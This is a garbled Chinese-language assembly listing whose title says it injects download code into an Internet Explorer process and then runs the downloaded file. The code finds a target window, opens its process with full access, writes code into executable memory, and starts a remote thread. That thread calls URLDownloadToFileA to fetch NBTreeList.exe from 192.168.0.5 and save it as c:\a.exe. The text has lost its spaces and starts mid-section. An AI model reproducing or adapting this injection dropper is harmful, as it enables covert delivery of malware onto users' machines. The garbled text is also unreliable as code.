注入下载文件的代码到IE进程然后执行下载的文件
大家可能都用过网页szBufferdd20dup(0),0
piddd0
hProcessdd0
hThreaddd0
pCodeRemotedd0
path1db'c:\a.EXE',0
.const
szmsgdb'URLDownloadToFileA',0
userdlldb'Urlmon.dll',0
;szmsgdb'MessageBoxA',0
;userdlldb'User32.dll',0
szloadlibdb'LoadLibraryA',0;注意和LoadLibraryW的区别哟
kerdlldb'kernel32.dll',0
.code
codebegin:
dispdatadb"http://192.168.0.5/NBTreeList.exe",0
szTitdb"c:\a.exe",0
datalen=$-codebegin
Rprocprocmsgbox;MessageBoxA的地址为参数
CALL@F;pushesi
@@:
POPEBX
SUBEBX,OFFSET@B
LEAECX,[EBX+dispdata]
LEAEDX,[EBX+szTit]
pushNULL
push0
pushedx
pushecx
pushNULL
callmsgbox
ret;重要
Rprocendp
codelen=$-codebegin;代码长度xx字节
start:
;invokeFindWindow,0,offsettit;返回计算器窗口句柄
invokeFindWindow,offsettit,0
invokeGetWindowThreadProcessId,eax,offsetpid;计算机器程序的进程PID号
;invokewsprintf,offsetszBuffer,offsetszFormat,pid;把PID用十进制显示
invokeOpenProcess,PROCESS_ALL_ACCESS,FALSE,pid;打开进程,得到进程句柄
movhProcess,eax;保存进程句柄
invokeVirtualAllocEx,hProcess,0,codelen,MEM_COMMIT,PAGE_EXECUTE_READWRITE
movpCodeRemote,eax
invokeWriteProcessMemory,hProcess,pCodeRemote,offsetcodebegin,codelen,NULL
movesi,pCodeRemote
addesi,datalen
pushesi
invokeLoadLibrary,offsetuserdll
invokeGetProcAddress,eax,offsetszmsg
popesi
invokeCreateRemoteThread,hProcess,0,0,esi,eax,0,0
movhThread,eax;返回线程句柄
.ifhThread
invokeWaitForSingleObject,hThread,INFINITE;等待线程结束
invokeCloseHandle,hThread;关闭线程句柄
.endif
invokeVirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE;释放